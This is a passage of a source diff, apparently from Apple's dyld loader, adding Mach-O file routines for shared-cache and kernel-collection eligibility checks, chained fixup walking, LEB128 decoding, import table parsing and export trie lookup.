"__DATA") == 0 ) + return; + + failureReason("RW segments other than __DATA requires split seg v2"); + foundBadSegment = true; + stop = true; + } + }); + + if ( foundBadSegment ) + return; + } + + // dyld_cache_patchable_location only supports addend in range 0..31 + // rdar://96164956 (dyld needs to support arbitrary addends in cache patch table) + const bool is64bit = is64(); + __block bool addendTooLarge = false; + const uint64_t tooLargeRegularAddend = 1 << 23; + const uint64_t tooLargeAuthAddend = 1 << 5; + if ( this->hasChainedFixups() ) { + + // with chained fixups, addends can be in the import table or embedded in a bind pointer + __block std::vector targetAddends; + fixups.forEachChainedFixupTarget(diag, ^(int libOrdinal, const char* symbolName, uint64_t addend, bool weakImport, bool& stop) { + if ( is64bit ) + addend &= 0x00FFFFFFFFFFFFFF; // ignore TBI + targetAddends.push_back(addend); + }); + // check each pointer for embedded addend + fixups.withChainStarts(diag, ^(const dyld_chained_starts_in_image* starts) { + fixups.forEachFixupInAllChains(diag, starts, false, ^(mach_o::ChainedFixupPointerOnDisk* fixupLoc, uint64_t fixupSegmentOffset, const dyld_chained_starts_in_segment* segInfo, bool& stop) { + switch (segInfo->pointer_format) { + case DYLD_CHAINED_PTR_ARM64E: + case DYLD_CHAINED_PTR_ARM64E_USERLAND: + if ( fixupLoc->arm64e.bind.bind ) { + uint64_t ordinal = fixupLoc->arm64e.bind.ordinal; + uint64_t addend = (ordinal < targetAddends.size()) ? targetAddends[ordinal] : 0; + if ( fixupLoc->arm64e.bind.auth ) { + if ( addend >= tooLargeAuthAddend ) { + addendTooLarge = true; + stop = true; + } + } else { + addend += fixupLoc->arm64e.signExtendedAddend(); + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + } + } + break; + case DYLD_CHAINED_PTR_ARM64E_USERLAND24: + if ( fixupLoc->arm64e.bind24.bind ) { + uint64_t ordinal = fixupLoc->arm64e.bind24.ordinal; + uint64_t addend = (ordinal < targetAddends.size()) ? targetAddends[ordinal] : 0; + if ( fixupLoc->arm64e.bind24.auth ) { + if ( addend >= tooLargeAuthAddend ) { + addendTooLarge = true; + stop = true; + } + } else { + addend += fixupLoc->arm64e.signExtendedAddend(); + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + } + } + break; + case DYLD_CHAINED_PTR_64: + case DYLD_CHAINED_PTR_64_OFFSET: { + if ( fixupLoc->generic64.rebase.bind ) { + uint64_t ordinal = fixupLoc->generic64.bind.ordinal; + uint64_t addend = (ordinal < targetAddends.size()) ? targetAddends[ordinal] : 0; + addend += fixupLoc->generic64.bind.addend; + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + } + break; + } + case DYLD_CHAINED_PTR_32: + if ( fixupLoc->generic32.bind.bind ) { + uint64_t ordinal = fixupLoc->generic32.bind.ordinal; + uint64_t addend = (ordinal < targetAddends.size()) ? targetAddends[ordinal] : 0; + addend += fixupLoc->generic32.bind.addend; + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + } + break; + } + }); + }); + } + else { + // scan bind opcodes for large addend + auto handler = ^(const mach_o::Fixups::BindTargetInfo &info, bool &stop) { + uint64_t addend = info.addend; + if ( is64bit ) + addend &= 0x00FFFFFFFFFFFFFF; // ignore TBI + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + }; + fixups.forEachBindTarget_Opcodes(diag, true, handler, handler); + } + if ( addendTooLarge ) { + failureReason("bind addend too large"); + return; + } + + if ( (isArch("x86_64") || isArch("x86_64h")) ) { + __block bool rebasesOk = true; + uint64_t startVMAddr = preferredLoadAddress(); + uint64_t endVMAddr = startVMAddr + mappedSize(); + fixups.forEachRebase(diag, ^(uint64_t runtimeOffset, uint64_t rebasedValue, bool &stop) { + // We allow TBI for x86_64 dylibs, but then require that the remainder of the offset + // is a 32-bit offset from the mach-header. + rebasedValue &= 0x00FFFFFFFFFFFFFFULL; + if ( (rebasedValue < startVMAddr) || (rebasedValue >= endVMAddr) ) { + failureReason("rebase value out of range of dylib"); + rebasesOk = false; + stop = true; + return; + } + + // Also error if the rebase location is anything other than 4/8 byte aligned + if ( (runtimeOffset & 0x3) != 0 ) { + failureReason("rebase value is not 4-byte aligned"); + rebasesOk = false; + stop = true; + return; + } + + // Error if the fixup will cross a page + if ( (runtimeOffset & 0xFFF) == 0xFFC ) { + failureReason("rebase value crosses page boundary"); + rebasesOk = false; + stop = true; + return; + } + }); + + if ( !rebasesOk ) + return; + + if ( this->hasChainedFixups() ) { + fixups.withChainStarts(diag, ^(const dyld_chained_starts_in_image* starts) { + fixups.forEachFixupInAllChains(diag, starts, false, ^(mach_o::ChainedFixupPointerOnDisk* fixupLoc, uint64_t fixupSegmentOffset, const dyld_chained_starts_in_segment* segInfo, bool& stop) { + if ( (fixupSegmentOffset & 0xFFF) == 0xFFC ) { + failureReason("chained fixup crosses page boundary"); + rebasesOk = false; + stop = true; + return; + } + }); + }); + } + + if ( !rebasesOk ) + return; + } + + // Check that shared cache dylibs don't use undefined lookup + { + __block bool bindsOk = true; + + auto checkBind = ^(int libOrdinal, bool& stop) { + if ( libOrdinal == BIND_SPECIAL_DYLIB_FLAT_LOOKUP ) { + failureReason("has dynamic_lookup binds"); + bindsOk = false; + stop = true; + } + }; + + if (hasChainedFixups()) { + fixups.forEachChainedFixupTarget(diag, ^(int libOrdinal, const char* symbolName, uint64_t addend, bool weakImport, bool& stop) { + checkBind(libOrdinal, stop); + }); + } else { + auto handler = ^(const mach_o::Fixups::BindTargetInfo &info, bool &stop) { + checkBind(info.libOrdinal, stop); + }; + fixups.forEachBindTarget_Opcodes(diag, true, handler, handler); + } + + if ( !bindsOk ) + return; + } + + passedLinkeditChecks = true; + }); + + return passedLinkeditChecks; +} + +// Returns true if the executable path is eligible for a PrebuiltLoader on the given platform. +bool MachOFile::canHavePrebuiltExecutableLoader(dyld3::Platform platform, const std::string_view& path, + void (^failureReason)(const char*)) const +{ + // For now we can't build prebuilt loaders for the simulator + if ( isSimulatorPlatform(platform) ) { + // Don't spam with tons of messages about executables + return false; + } + + if ( (platform == dyld3::Platform::macOS) || (platform == dyld3::Platform::iOSMac) ) { + // We no longer support ROSP, so skip all paths which start with the special prefix + if ( path.starts_with("/System/Library/Templates/Data/") ) { + // Dont spam the user with an error about paths when we know these are never eligible. + return false; + } + + static const char* sAllowedPrefixes[] = { + "/bin/", + "/sbin/", + "/usr/", + "/System/", + "/Library/Apple/System/", + "/Library/Apple/usr/", + "/System/Applications/Safari.app/", + "/Library/CoreMediaIO/Plug-Ins/DAL/" // temp until plugins moved or closured working + }; + + bool inSearchDir = false; + for ( const char* searchDir : sAllowedPrefixes ) { + if ( path.starts_with(searchDir) ) { + inSearchDir = true; + break; + } + } + + if ( !inSearchDir ) { + failureReason("path not eligible"); + return false; + } + } else { + // On embedded, only staged apps are excluded. They will run from a different location at runtime + if ( path.find("/staged_system_apps/") != std::string::npos ) { + // Dont spam the user with an error about paths when we know these are never eligible. + return false; + } + } + + if ( !hasCodeSignature() ) { + failureReason("missing code signature"); + return false; + } + + return true; +} +#endif + +#if BUILDING_APP_CACHE_UTIL +bool MachOFile::canBePlacedInKernelCollection(const char* path, void (^failureReason)(const char*)) const +{ + // only dylibs and the kernel itself can go in cache + if ( this->filetype == MH_EXECUTE ) { + // xnu + } else if ( this->isKextBundle() ) { + // kext's + } else { + failureReason("Not MH_KEXT_BUNDLE"); + return false; + } + + if ( this->filetype == MH_EXECUTE ) { + // xnu + + // two-level namespace binaries cannot go in cache + if ( (this->flags & MH_TWOLEVEL) != 0 ) { + failureReason("Built with two level namespaces"); + return false; + } + + // xnu kernel cannot have a page zero + __block bool foundPageZero = false; + forEachSegment(^(const SegmentInfo &segmentInfo, bool &stop) { + if ( strcmp(segmentInfo.segName, "__PAGEZERO") == 0 ) { + foundPageZero = true; + stop = true; + } + }); + if (foundPageZero) { + failureReason("Has __PAGEZERO"); + return false; + } + + // xnu must have an LC_UNIXTHREAD to point to the entry point + __block bool foundMainLC = false; + __block bool foundUnixThreadLC = false; + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_MAIN ) { + foundMainLC = true; + stop = true; + } + else if ( cmd->cmd == LC_UNIXTHREAD ) { + foundUnixThreadLC = true; + } + }); + if (foundMainLC) { + failureReason("Found LC_MAIN"); + return false; + } + if (!foundUnixThreadLC) { + failureReason("Expected LC_UNIXTHREAD"); + return false; + } + + if (diag.hasError()) { + failureReason("Error parsing load commands"); + return false; + } + + // The kernel should be a static executable, not a dynamic one + if ( !isStaticExecutable() ) { + failureReason("Expected static executable"); + return false; + } + + // The kernel must be built with -pie + if ( !isPIE() ) { + failureReason("Expected pie"); + return false; + } + } + + if ( isArch("arm64e") && isKextBundle() && !hasChainedFixups() ) { + failureReason("Missing fixup information"); + return false; + } + + // dylibs with interposing info cannot be in cache + if ( hasInterposingTuples() ) { + failureReason("Has interposing tuples"); + return false; + } + + // Only x86_64 is allowed to have RWX segments + if ( !isArch("x86_64") && !isArch("x86_64h") ) { + __block bool foundBadSegment = false; + forEachSegment(^(const SegmentInfo &info, bool &stop) { + if ( (info.protections & (VM_PROT_WRITE | VM_PROT_EXECUTE)) == (VM_PROT_WRITE | VM_PROT_EXECUTE) ) { + failureReason("Segments are not allowed to be both writable and executable"); + foundBadSegment = true; + stop = true; + } + }); + if ( foundBadSegment ) + return false; + } + + return true; +} + +bool MachOFile::usesClassicRelocationsInKernelCollection() const { + // The xnu x86_64 static executable needs to do the i386->x86_64 transition + // so will be emitted with classic relocations + if ( isArch("x86_64") || isArch("x86_64h") ) { + return isStaticExecutable() || isFileSet(); + } + return false; +} +#endif + +#if BUILDING_CACHE_BUILDER || BUILDING_CACHE_BUILDER_UNIT_TESTS +static bool platformExcludesPrebuiltClosure_macOS(const char* path) { + // We no longer support ROSP, so skip all paths which start with the special prefix + if ( startsWith(path, "/System/Library/Templates/Data/") ) + return true; + + // anything inside a .app bundle is specific to app, so should not get a prebuilt closure + if ( strstr(path, ".app/") != NULL ) + return true; + + return false; +} + +static bool platformExcludesPrebuiltClosure_iOS(const char* path) { + if ( strcmp(path, "/System/Library/Caches/com.apple.xpc/sdk.dylib") == 0 ) + return true; + if ( strcmp(path, "/System/Library/Caches/com.apple.xpcd/xpcd_cache.dylib") == 0 ) + return true; + return false; +} + +// Returns true if the current platform requires that this install name be excluded from the shared cache +// Note that this overrides any exclusion from anywhere else. +static bool platformExcludesPrebuiltClosure(Platform platform, const char* path) { + if ( MachOFile::isSimulatorPlatform(platform) ) + return false; + if ( (platform == dyld3::Platform::macOS) || (platform == dyld3::Platform::iOSMac) ) + return platformExcludesPrebuiltClosure_macOS(path); + // Everything else is based on iOS so just use that value + return platformExcludesPrebuiltClosure_iOS(path); +} + +bool MachOFile::canHavePrecomputedDlopenClosure(const char* path, void (^failureReason)(const char*)) const +{ + __block bool retval = true; + + // only dylibs can go in cache + if ( (this->filetype != MH_DYLIB) && (this->filetype != MH_BUNDLE) ) { + retval = false; + failureReason("not MH_DYLIB or MH_BUNDLE"); + } + + // flat namespace files cannot go in cache + if ( (this->flags & MH_TWOLEVEL) == 0 ) { + retval = false; + failureReason("not built with two level namespaces"); + } + + // can only depend on other dylibs with absolute paths + __block bool allDepPathsAreGood = true; + forEachDependentDylib(^(const char* loadPath, bool isWeak, bool isReExport, bool isUpward, uint32_t compatVersion, uint32_t curVersion, bool& stop) { + if ( loadPath[0] != '/' ) { + allDepPathsAreGood = false; + stop = true; + } + }); + if ( !allDepPathsAreGood ) { + retval = false; + failureReason("depends on dylibs that are not absolute paths"); + } + + __block bool platformExcludedFile = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + if ( platformExcludedFile ) + return; + if ( platformExcludesPrebuiltClosure(platform, path) ) { + platformExcludedFile = true; + return; + } + }); + if ( platformExcludedFile ) { + failureReason("file cannot get a prebuilt closure on this platform"); + return false; + } + + // dylibs with interposing info cannot have dlopen closure pre-computed + if ( hasInterposingTuples() ) { + retval = false; + failureReason("has interposing tuples"); + } + + // special system dylib overrides cannot have closure pre-computed + if ( strncmp(path, "/usr/lib/system/introspection/", 30) == 0 ) { + retval = false; + failureReason("override of OS dylib"); + } + + return retval; +} +#endif + +bool MachOFile::hasInterposingTuples() const +{ + __block bool hasInterposing = false; + Diagnostics diag; + forEachInterposingSection(diag, ^(uint64_t vmOffset, uint64_t vmSize, bool &stop) { + hasInterposing = true; + stop = true; + }); + return hasInterposing; +} + +bool MachOFile::isFairPlayEncrypted(uint32_t& textOffset, uint32_t& size) const +{ + if ( const encryption_info_command* encCmd = findFairPlayEncryptionLoadCommand() ) { + if ( encCmd->cryptid == 1 ) { + // Note: cryptid is 0 in just-built apps. The AppStore sets cryptid to 1 + textOffset = encCmd->cryptoff; + size = encCmd->cryptsize; + return true; + } + } + textOffset = 0; + size = 0; + return false; +} + +bool MachOFile::canBeFairPlayEncrypted() const +{ + return (findFairPlayEncryptionLoadCommand() != nullptr); +} + +const encryption_info_command* MachOFile::findFairPlayEncryptionLoadCommand() const +{ + __block const encryption_info_command* result = nullptr; + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( (cmd->cmd == LC_ENCRYPTION_INFO) || (cmd->cmd == LC_ENCRYPTION_INFO_64) ) { + result = (encryption_info_command*)cmd; + stop = true; + } + }); + if ( diag.noError() ) + return result; + else + return nullptr; +} + + +bool MachOFile::hasLoadCommand(uint32_t cmdNum) const +{ + __block bool hasLC = false; + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == cmdNum ) { + hasLC = true; + stop = true; + } + }); + return hasLC; +} + +bool MachOFile::allowsAlternatePlatform() const +{ + __block bool result = false; + forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) { + if ( (strcmp(info.sectName, "__allow_alt_plat") == 0) && (strncmp(info.segInfo.segName, "__DATA", 6) == 0) ) { + result = true; + stop = true; + } + }); + return result; +} + +bool MachOFile::hasChainedFixups() const +{ +#if SUPPORT_ARCH_arm64e + // arm64e always uses chained fixups + if ( (this->cputype == CPU_TYPE_ARM64) && (this->maskedCpuSubtype() == CPU_SUBTYPE_ARM64E) ) { + // Not all binaries have fixups at all so check for the load commands + return hasLoadCommand(LC_DYLD_INFO_ONLY) || hasLoadCommand(LC_DYLD_CHAINED_FIXUPS); + } +#endif + return hasLoadCommand(LC_DYLD_CHAINED_FIXUPS); +} + +bool MachOFile::hasChainedFixupsLoadCommand() const +{ + return hasLoadCommand(LC_DYLD_CHAINED_FIXUPS); +} + +bool MachOFile::hasOpcodeFixups() const +{ + return hasLoadCommand(LC_DYLD_INFO_ONLY) || hasLoadCommand(LC_DYLD_INFO) ; +} + +uint16_t MachOFile::chainedPointerFormat(const dyld_chained_fixups_header* header) +{ + const dyld_chained_starts_in_image* startsInfo = (dyld_chained_starts_in_image*)((uint8_t*)header + header->starts_offset); + for (uint32_t i=0; i < startsInfo->seg_count; ++i) { + uint32_t segInfoOffset = startsInfo->seg_info_offset[i]; + // 0 offset means this segment has no fixups + if ( segInfoOffset == 0 ) + continue; + const dyld_chained_starts_in_segment* segInfo = (dyld_chained_starts_in_segment*)((uint8_t*)startsInfo + segInfoOffset); + if ( segInfo->page_count != 0 ) + return segInfo->pointer_format; + } + return 0; // no chains (perhaps no __DATA segment) +} + +// find dyld_chained_starts_in_image* in image +// if old arm64e binary, synthesize dyld_chained_starts_in_image* +void MachOFile::withChainStarts(Diagnostics& diag, const dyld_chained_fixups_header* chainHeader, void (^callback)(const dyld_chained_starts_in_image*)) +{ + if ( chainHeader == nullptr ) { + diag.error("Must pass in a chain header"); + return; + } + // we have a pre-computed offset into LINKEDIT for dyld_chained_starts_in_image + callback((dyld_chained_starts_in_image*)((uint8_t*)chainHeader + chainHeader->starts_offset)); +} + +void MachOFile::forEachFixupChainSegment(Diagnostics& diag, const dyld_chained_starts_in_image* starts, + void (^handler)(const dyld_chained_starts_in_segment* segInfo, uint32_t segIndex, bool& stop)) +{ + bool stopped = false; + for (uint32_t segIndex=0; segIndex < starts->seg_count && !stopped; ++segIndex) { + if ( starts->seg_info_offset[segIndex] == 0 ) + continue; + const dyld_chained_starts_in_segment* segInfo = (dyld_chained_starts_in_segment*)((uint8_t*)starts + starts->seg_info_offset[segIndex]); + handler(segInfo, segIndex, stopped); + } +} + + +bool MachOFile::walkChain(Diagnostics& diag, ChainedFixupPointerOnDisk* chain, uint16_t pointer_format, bool notifyNonPointers, uint32_t max_valid_pointer, + void (^handler)(ChainedFixupPointerOnDisk* fixupLocation, bool& stop)) +{ + const unsigned stride = ChainedFixupPointerOnDisk::strideSize(pointer_format); + bool stop = false; + bool chainEnd = false; + while (!stop && !chainEnd) { + // copy chain content, in case handler modifies location to final value + ChainedFixupPointerOnDisk chainContent = *chain; + handler(chain, stop); + + if ( !stop ) { + switch (pointer_format) { + case DYLD_CHAINED_PTR_ARM64E: + case DYLD_CHAINED_PTR_ARM64E_KERNEL: + case DYLD_CHAINED_PTR_ARM64E_USERLAND: + case DYLD_CHAINED_PTR_ARM64E_USERLAND24: + case DYLD_CHAINED_PTR_ARM64E_FIRMWARE: + if ( chainContent.arm64e.rebase.next == 0 ) + chainEnd = true; + else + chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.arm64e.rebase.next*stride); + break; + case DYLD_CHAINED_PTR_64: + case DYLD_CHAINED_PTR_64_OFFSET: + if ( chainContent.generic64.rebase.next == 0 ) + chainEnd = true; + else + chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.generic64.rebase.next*4); + break; + case DYLD_CHAINED_PTR_32: + if ( chainContent.generic32.rebase.next == 0 ) + chainEnd = true; + else { + chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.generic32.rebase.next*4); + if ( !notifyNonPointers ) { + while ( (chain->generic32.rebase.bind == 0) && (chain->generic32.rebase.target > max_valid_pointer) ) { + // not a real pointer, but a non-pointer co-opted into chain + chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chain->generic32.rebase.next*4); + } + } + } + break; + case DYLD_CHAINED_PTR_64_KERNEL_CACHE: + case DYLD_CHAINED_PTR_X86_64_KERNEL_CACHE: + if ( chainContent.kernel64.next == 0 ) + chainEnd = true; + else + chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.kernel64.next*stride); + break; + case DYLD_CHAINED_PTR_32_FIRMWARE: + if ( chainContent.firmware32.next == 0 ) + chainEnd = true; + else + chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.firmware32.next*4); + break; + default: + diag.error("unknown pointer format 0x%04X", pointer_format); + stop = true; + } + } + } + return stop; +} + +void MachOFile::forEachFixupInSegmentChains(Diagnostics& diag, const dyld_chained_starts_in_segment* segInfo, + bool notifyNonPointers, uint8_t* segmentContent, + void (^handler)(ChainedFixupPointerOnDisk* fixupLocation, bool& stop)) +{ + bool stopped = false; + for (uint32_t pageIndex=0; pageIndex < segInfo->page_count && !stopped; ++pageIndex) { + uint16_t offsetInPage = segInfo->page_start[pageIndex]; + if ( offsetInPage == DYLD_CHAINED_PTR_START_NONE ) + continue; + if ( offsetInPage & DYLD_CHAINED_PTR_START_MULTI ) { + // 32-bit chains which may need multiple starts per page + uint32_t overflowIndex = offsetInPage & ~DYLD_CHAINED_PTR_START_MULTI; + bool chainEnd = false; + while (!stopped && !chainEnd) { + chainEnd = (segInfo->page_start[overflowIndex] & DYLD_CHAINED_PTR_START_LAST); + offsetInPage = (segInfo->page_start[overflowIndex] & ~DYLD_CHAINED_PTR_START_LAST); + uint8_t* pageContentStart = segmentContent + (pageIndex * segInfo->page_size); + ChainedFixupPointerOnDisk* chain = (ChainedFixupPointerOnDisk*)(pageContentStart+offsetInPage); + stopped = walkChain(diag, chain, segInfo->pointer_format, notifyNonPointers, segInfo->max_valid_pointer, handler); + ++overflowIndex; + } + } + else { + // one chain per page + uint8_t* pageContentStart = segmentContent + (pageIndex * segInfo->page_size); + ChainedFixupPointerOnDisk* chain = (ChainedFixupPointerOnDisk*)(pageContentStart+offsetInPage); + stopped = walkChain(diag, chain, segInfo->pointer_format, notifyNonPointers, segInfo->max_valid_pointer, handler); + } + } +} + +void MachOFile::forEachChainedFixupTarget(Diagnostics& diag, const dyld_chained_fixups_header* header, + const linkedit_data_command* chainedFixups, + void (^callback)(int libOrdinal, const char* symbolName, uint64_t addend, bool weakImport, bool& stop)) +{ + if ( (header->imports_offset > chainedFixups->datasize) || (header->symbols_offset > chainedFixups->datasize) ) { + diag.error("malformed import table"); + return; + } + + bool stop = false; + + const dyld_chained_import* imports; + const dyld_chained_import_addend* importsA32; + const dyld_chained_import_addend64* importsA64; + const char* symbolsPool = (char*)header + header->symbols_offset; + uint32_t maxSymbolOffset = chainedFixups->datasize - header->symbols_offset; + int libOrdinal; + switch (header->imports_format) { + case DYLD_CHAINED_IMPORT: + imports = (dyld_chained_import*)((uint8_t*)header + header->imports_offset); + for (uint32_t i=0; i < header->imports_count && !stop; ++i) { + const char* symbolName = &symbolsPool[imports[i].name_offset]; + if ( imports[i].name_offset > maxSymbolOffset ) { + diag.error("malformed import table, string overflow"); + return; + } + uint8_t libVal = imports[i].lib_ordinal; + if ( libVal > 0xF0 ) + libOrdinal = (int8_t)libVal; + else + libOrdinal = libVal; + callback(libOrdinal, symbolName, 0, imports[i].weak_import, stop); + if ( stop ) + return; + } + break; + case DYLD_CHAINED_IMPORT_ADDEND: + importsA32 = (dyld_chained_import_addend*)((uint8_t*)header + header->imports_offset); + for (uint32_t i=0; i < header->imports_count && !stop; ++i) { + const char* symbolName = &symbolsPool[importsA32[i].name_offset]; + if ( importsA32[i].name_offset > maxSymbolOffset ) { + diag.error("malformed import table, string overflow"); + return; + } + uint8_t libVal = importsA32[i].lib_ordinal; + if ( libVal > 0xF0 ) + libOrdinal = (int8_t)libVal; + else + libOrdinal = libVal; + callback(libOrdinal, symbolName, importsA32[i].addend, importsA32[i].weak_import, stop); + if ( stop ) + return; + } + break; + case DYLD_CHAINED_IMPORT_ADDEND64: + importsA64 = (dyld_chained_import_addend64*)((uint8_t*)header + header->imports_offset); + for (uint32_t i=0; i < header->imports_count && !stop; ++i) { + const char* symbolName = &symbolsPool[importsA64[i].name_offset]; + if ( importsA64[i].name_offset > maxSymbolOffset ) { + diag.error("malformed import table, string overflow"); + return; + } + uint16_t libVal = importsA64[i].lib_ordinal; + if ( libVal > 0xFFF0 ) + libOrdinal = (int16_t)libVal; + else + libOrdinal = libVal; + callback(libOrdinal, symbolName, importsA64[i].addend, importsA64[i].weak_import, stop); + if ( stop ) + return; + } + break; + default: + diag.error("unknown imports format"); + return; + } +} + +uint64_t MachOFile::read_uleb128(Diagnostics& diag, const uint8_t*& p, const uint8_t* end) +{ + uint64_t result = 0; + int bit = 0; + do { + if ( p == end ) { + diag.error("malformed uleb128"); + break; + } + uint64_t slice = *p & 0x7f; + + if ( bit > 63 ) { + diag.error("uleb128 too big for uint64"); + break; + } + else { + result |= (slice << bit); + bit += 7; + } + } + while (*p++ & 0x80); + return result; +} + + +int64_t MachOFile::read_sleb128(Diagnostics& diag, const uint8_t*& p, const uint8_t* end) +{ + int64_t result = 0; + int bit = 0; + uint8_t byte = 0; + do { + if ( p == end ) { + diag.error("malformed sleb128"); + break; + } + byte = *p++; + result |= (((int64_t)(byte & 0x7f)) << bit); + bit += 7; + } while (byte & 0x80); + // sign extend negative numbers + if ( ((byte & 0x40) != 0) && (bit < 64) ) + result |= (~0ULL) << bit; + return result; +} + +static void getArchNames(const GradedArchs& archs, bool isOSBinary, char buffer[256]) +{ + buffer[0] = '\0'; + archs.forEachArch(isOSBinary, ^(const char* archName) { + if ( buffer[0] != '\0' ) + strlcat(buffer, "' or '", 256); + strlcat(buffer, archName, 256); + }); +} + +const MachOFile* MachOFile::compatibleSlice(Diagnostics& diag, const void* fileContent, size_t contentSize, const char* path, Platform platform, bool isOSBinary, const GradedArchs& archs, bool internalInstall) +{ + const MachOFile* mf = nullptr; + if ( const dyld3::FatFile* ff = dyld3::FatFile::isFatFile(fileContent) ) { + uint64_t sliceOffset; + uint64_t sliceLen; + bool missingSlice; + if ( ff->isFatFileWithSlice(diag, contentSize, archs, isOSBinary, sliceOffset, sliceLen, missingSlice) ) { + mf = (MachOFile*)((long)fileContent + sliceOffset); + } + else { + BLOCK_ACCCESSIBLE_ARRAY(char, gradedArchsBuf, 256); + getArchNames(archs, isOSBinary, gradedArchsBuf); + + char strBuf[256]; + diag.error("fat file, but missing compatible architecture (have '%s', need '%s')", ff->archNames(strBuf, contentSize), gradedArchsBuf); + return nullptr; + } + } + else { + mf = (MachOFile*)fileContent; + } + + if ( !mf->hasMachOMagic() || !mf->isMachO(diag, contentSize) ) { + if ( diag.noError() ) + diag.error("not a mach-o file"); + return nullptr; + } + + if ( archs.grade(mf->cputype, mf->cpusubtype, isOSBinary) == 0 ) { + BLOCK_ACCCESSIBLE_ARRAY(char, gradedArchsBuf, 256); + getArchNames(archs, isOSBinary, gradedArchsBuf); + diag.error("mach-o file, but is an incompatible architecture (have '%s', need '%s')", mf->archName(), gradedArchsBuf); + return nullptr; + } + + if ( !mf->loadableIntoProcess(platform, path, internalInstall) ) { + __block Platform havePlatform = Platform::unknown; + mf->forEachSupportedPlatform(^(Platform aPlat, uint32_t minOS, uint32_t sdk) { + havePlatform = aPlat; + }); + diag.error("mach-o file (%s), but incompatible platform (have '%s', need '%s')", path, MachOFile::platformName(havePlatform), MachOFile::platformName(platform)); + return nullptr; + } + + return mf; +} + +const uint8_t* MachOFile::trieWalk(Diagnostics& diag, const uint8_t* start, const uint8_t* end, const char* symbol) +{ + STACK_ALLOC_OVERFLOW_SAFE_ARRAY(uint32_t, visitedNodeOffsets, 128); + visitedNodeOffsets.push_back(0); + const uint8_t* p = start; + while ( p < end ) { + uint64_t terminalSize = *p++; + if ( terminalSize > 127 ) { + // except for re-export-with-rename, all terminal sizes fit in one byte + --p; + terminalSize = read_uleb128(diag, p, end); + if ( diag.hasError() ) + return nullptr; + } + if ( (*symbol == '\0') && (terminalSize != 0) ) { + return p; + } + const uint8_t* children = p + terminalSize; + if ( children > end ) { + //diag.error("malformed trie node, terminalSize=0x%llX extends past end of trie\n", terminalSize); + return nullptr; + } + uint8_t childrenRemaining = *children++; + p = children; + uint64_t nodeOffset = 0; + for (; childrenRemaining > 0; --childrenRemaining) { + const char* ss = symbol; + bool wrongEdge = false; + // scan whole edge to get to next edge + // if edge is longer than target symbol name, don't read past end of symbol name + char c = *p; + while ( c != '\0' ) { + if ( !wrongEdge ) { + if ( c != *ss ) + wrongEdge = true; + ++ss; + } + ++p; + c = *p; + } + if ( wrongEdge ) { + // advance to next child + ++p; // skip over zero terminator + // skip over uleb128 until last byte is found + while ( (*p & 0x80) != 0 ) + ++p; + ++p; // skip over last byte of uleb128 + if ( p > end ) { + diag.error("malformed trie node, child node extends past end of trie\n"); + return nullptr; + } + } + else { + // the symbol so far matches this edge (child) + // so advance to the child's node + ++p; + nodeOffset = read_uleb128(diag, p, end); + if ( diag.hasError() ) + return nullptr; + if ( (nodeOffset == 0) || ( &start[nodeOffset] > end) ) { + diag.error("malformed trie child, nodeOffset=0x%llX out of range\n", nodeOffset); + return nullptr; + } + symbol = ss; + break; + } + } + if ( nodeOffset != 0 ) { + if ( nodeOffset > (uint64_t)(end-start) ) { + diag.error("malformed trie child, nodeOffset=0x%llX out of range\n", nodeOffset); + return nullptr; + } + // check for cycles + for (uint32_t aVisitedNodeOffset : visitedNodeOffsets) { + if ( aVisitedNodeOffset == nodeOffset ) { + diag.error("malformed trie child, cycle to nodeOffset=0x%llX\n", nodeOffset); + return nullptr; + } + } + visitedNodeOffsets.push_back((uint32_t)nodeOffset); + p = &start[nodeOffset]; + } + else + p = end; + } + return nullptr; +} + +void MachOFile::forEachRPath(void (^callback)(const char* rPath, bool& stop)) const +{ + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_RPATH ) { + const char* rpath = (char*)cmd + ((struct rpath_command*)cmd)->path.offset; + callback(rpath, stop); + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + + +bool MachOFile::inCodeSection(uint32_t runtimeOffset) const +{ + // only needed for arm64e code to know to sign pointers + if ( (this->cputype != CPU_TYPE_ARM64) || (this->maskedCpuSubtype() != CPU_SUBTYPE_ARM64E) ) + return false; + + __block bool result = false; + uint64_t baseAddress = this->preferredLoadAddress(); + this->forEachSection(^(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop) { + if ( ((sectInfo.sectAddr-baseAddress) <= runtimeOffset) && (runtimeOffset < (sectInfo.sectAddr+sectInfo.sectSize-baseAddress)) ) { + result = ( (sectInfo.sectFlags & S_ATTR_PURE_INSTRUCTIONS) || (sectInfo.sectFlags & S_ATTR_SOME_INSTRUCTIONS) ); + stop = true; + } + }); + return result; +} + +uint32_t MachOFile::dependentDylibCount(bool* allDepsAreNormalPtr) const +{ + __block uint32_t count = 0; + __block bool allDepsAreNormal = true; + forEachDependentDylib(^(const char* loadPath, bool isWeak, bool isReExport, bool isUpward, uint32_t compatVersion, uint32_t curVersion, bool& stop) { + ++count; + if ( isWeak || isReExport || isUpward ) + allDepsAreNormal = false; + }); + + if ( allDepsAreNormalPtr != nullptr ) + *allDepsAreNormalPtr = allDepsAreNormal; + return count; +} + +bool MachOFile::hasPlusLoadMethod(Diagnostics& diag) const +{ + __block bool result = false; + + // in new objc runtime compiler puts classes/categories with +load method in specical section + forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) 